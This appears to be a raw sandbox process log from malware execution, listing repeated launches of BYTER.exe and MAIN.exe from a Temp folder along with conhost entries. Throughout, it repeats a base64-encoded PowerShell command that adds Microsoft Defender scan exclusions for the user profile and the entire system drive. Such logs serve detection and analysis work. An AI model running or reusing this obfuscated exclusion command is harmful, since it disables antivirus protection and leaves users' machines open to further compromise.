"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "40315970526016847686875520-2052835158-1570726529-1043843204-1332126734-307665969"
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "9552789131872800189-1467004871-643479173604001312110694821-571614181204897437"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1798402866-854451321-1498489360-1128336277-133119129215744342521431272360-200970955"
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-9861232508163872984715320891318032363-1319720850-2688157671497766409-228127435"
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
